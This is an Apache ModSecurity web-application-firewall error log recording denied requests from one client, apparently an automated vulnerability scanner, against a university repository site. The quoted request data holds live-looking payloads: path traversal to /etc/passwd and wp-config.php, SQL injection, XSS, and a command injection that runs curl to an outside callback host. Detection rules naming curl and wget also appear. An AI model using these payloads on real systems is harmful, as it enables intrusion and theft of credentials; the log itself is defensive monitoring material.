[Tue Aug 29 11:39:12.476596 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAYlCOIAAAAP"]
[Tue Aug 29 11:39:12.569871 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYMWOoAAAAR"]
[Tue Aug 29 11:39:13.050560 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQSQAAAAr"]
[Tue Aug 29 11:39:18.679093 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXbcC8AAAAL"]
[Tue Aug 29 11:39:23.565179 2023] [:error] [pid 1702] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAamasUAAAAt"]
[Tue Aug 29 11:39:36.559123 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXVy2UAAAAB"]
[Tue Aug 29 11:39:48.419360 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAaW4TAAAAAk"]
[Tue Aug 29 11:39:56.438434 2023] [:error] [pid 1701] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAali08AAAAs"]
[Tue Aug 29 11:40:02.512732 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gwxr6mskbrqs47.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAXA9ucAAAAO"]
[Tue Aug 29 11:40:05.520482 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAaO3f4AAAAX"]
[Tue Aug 29 11:40:07.384769 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcYUzwAAAAp"]
[Tue Aug 29 11:40:07.404995 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAafE2YAAAAW"]
[Tue Aug 29 11:40:12.433401 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAcBbYMAAAAH"]
[Tue Aug 29 11:40:22.407291 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYMWPgAAAAR"]
[Tue Aug 29 11:40:22.649344 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYf-GMAAAAD"]
[Tue Aug 29 11:40:32.444469 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAXbcMcAAAAL"]
[Tue Aug 29 11:40:33.365208 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcjAjMAAAAw"]
[Tue Aug 29 11:40:36.631523 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAYMWR8AAAAR"]
[Tue Aug 29 11:40:37.430614 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAYMWSMAAAAR"]
[Tue Aug 29 11:40:39.432362 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiywAAAAa"]
[Tue Aug 29 11:40:40.380322 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcVJP0AAAAB"]
[Tue Aug 29 11:40:44.444002 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizcAAAAa"]
[Tue Aug 29 11:40:44.585713 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAYf-JUAAAAD"]
[Tue Aug 29 11:40:46.489578 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAXbcO4AAAAL"]
[Tue Aug 29 11:40:50.364214 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcjAkgAAAAw"]
[Tue Aug 29 11:40:50.426942 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcbSAMAAAAv"]
[Tue Aug 29 11:40:53.516199 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEIAAAAH"]
[Tue Aug 29 11:40:55.454809 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcPi0kAAAAa"]
[Tue Aug 29 11:40:58.352531 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAaZ9kwAAAAo"]
[Tue Aug 29 11:40:58.388004 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcjAlsAAAAw"]
[Tue Aug 29 11:40:58.480279 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcqJGYAAAAG"]
